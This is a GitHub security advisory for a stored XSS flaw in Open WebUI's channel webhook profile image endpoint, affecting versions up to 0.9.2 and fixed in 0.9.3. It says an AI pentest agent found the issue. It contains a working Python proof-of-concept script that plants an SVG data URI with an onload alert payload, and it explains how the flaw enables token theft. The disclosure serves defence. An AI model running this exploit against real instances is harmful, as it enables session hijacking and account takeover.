GHSA-3856-3vxq-m6fc

Suggest an improvement
Source
https://github.com/advisories/GHSA-3856-3vxq-m6fc
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-3856-3vxq-m6fc/GHSA-3856-3vxq-m6fc.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3856-3vxq-m6fc
Aliases
  • CVE-2026-45314
Published
2026-05-14T20:18:09Z
Modified
2026-05-14T20:35:26.883846Z
Severity
  • 7.4 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N CVSS Calculator
Summary
Open WebUI has XSS via SVG in /api/v1/channels/webhooks/{webhook_id}/profile/image
Details

As part of our research on improving our AI pentest, we have uncovered the following issue in Open WebUI. We've manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.

Summary

The channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.

Details

The server accepts data:image/svg+xml;base64,... values for profile_image_url when creating or updating a webhook. Later, GET /api/v1/channels/webhooks/{webhook_id}/profile/image detects data:image, base64-decodes it, derives the media type from the header (e.g., image/svg+xml), and returns a StreamingResponse with Content-Disposition: inline and media_type set to image/svg+xml. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.

PoC

  1. Set up a new instance of Open WebUI and log in as admin
  2. In the Admin Panel, enable Channels (Beta) and click Save
  3. Create a low-privilege user in the Users tab
  4. As the attacker, use the low-privilege user to run the following script:
import base64
import secrets

import requests

BASE_URL = "http://127.0.0.1:14000"
EMAIL = "low@local.test"
PASSWORD = "low"

CHANNEL_NAME_PREFIX = "xsswh-poc"
WEBHOOK_NAME = "xss-webhook-poc"
SVG_CANARY = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(origin)"></svg>'

if __name__ == "__main__":
    s = requests.Session()
    s.headers.update({"Content-Type": "application/json"})

    r = s.post(
        f"{BASE_URL}/api/v1/auths/signin",
        json={"email": EMAIL, "password": PASSWORD},
        timeout=30,
    )
    r.raise_for_status()
    s.headers["Authorization"] = f"Bearer {r.json()['token']}"

    r = s.post(
        f"{BASE_URL}/api/v1/channels/create",
        json={
            "name": f"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}",
            "type": "group",
            "user_ids": [],
            "group_ids": [],
        },
        timeout=30,
    )
    r.raise_for_status()
    channel_id = r.json()["id"]

    payload = "data:image/svg+xml;base64," + base64.b64encode(SVG_CANARY.encode()).decode()
    r = s.post(
        f"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create",
        json={"name": WEBHOOK_NAME, "profile_image_url": payload},
        timeout=30,
    )
    r.raise_for_status()
    webhook_id = r.json()["id"]

    print(f"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image")

This should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:

http://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image

<img width="1079" height="222" alt="image" src="https://github.com/user-attachments/assets/ce158ace-d14f-4a73-aeb0-e828aff005df" />

Impact

Conditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.

Stored XSS enables arbitrary JavaScript execution in the context of the application's origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook's profile image, it remains active until removed.

Original Agent Report

<img width="400" alt="app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439766 (5)" src="https://github.com/user-attachments/assets/0bfb2c7c-f7c4-49cd-a262-5ed9e1bb10df" />

Database specific
{
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:18:09Z",
    "nvd_published_at": null
}
References

Affected packages

PyPI / open-webui

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.9.3

Affected versions

0.*
0.1.124
0.1.125
0.2.0
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.3.6
0.3.7
0.3.8
0.3.9
0.3.10
0.3.12
0.3.13
0.3.14
0.3.15
0.3.16
0.3.17.dev2
0.3.17.dev3
0.3.17.dev4
0.3.17.dev5
0.3.17
0.3.18
0.3.19
0.3.20
0.3.21
0.3.22
0.3.23
0.3.24
0.3.25
0.3.26
0.3.27.dev1
0.3.27.dev2
0.3.27.dev3
0.3.27
0.3.28
0.3.29
0.3.30.dev1
0.3.30.dev2
0.3.30
0.3.31.dev1
0.3.31
0.3.32
0.3.33.dev1
0.3.33
0.3.34
0.3.35
0.4.0.dev1
0.4.0.dev2
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6.dev1
0.4.6
0.4.7
0.4.8
0.5.0.dev1
0.5.0.dev2
0.5.0
0.5.1
0.5.2
0.5.3.dev1
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.8
0.5.9
0.5.10
0.5.11
0.5.12
0.5.13
0.5.14
0.5.15
0.5.16
0.5.17
0.5.18
0.5.19
0.5.20
0.6.0
0.6.1
0.6.2
0.6.3
0.6.4
0.6.5
0.6.6.dev1
0.6.6
0.6.7
0.6.8
0.6.9
0.6.10
0.6.11
0.6.12
0.6.13
0.6.14
0.6.15
0.6.16
0.6.18
0.6.19
0.6.20
0.6.21
0.6.22
0.6.23
0.6.24
0.6.25
0.6.26.dev1
0.6.26
0.6.27
0.6.28
0.6.29
0.6.30
0.6.31
0.6.32
0.6.33
0.6.34
0.6.35
0.6.36
0.6.37
0.6.38
0.6.39
0.6.40
0.6.41
0.6.42
0.6.43
0.7.0
0.7.1
0.7.2
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.6
0.8.7
0.8.8
0.8.9
0.8.10
0.8.11
0.8.12
0.9.0
0.9.1
0.9.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-3856-3vxq-m6fc/GHSA-3856-3vxq-m6fc.json"
last_known_affected_version_range
"<= 0.9.2"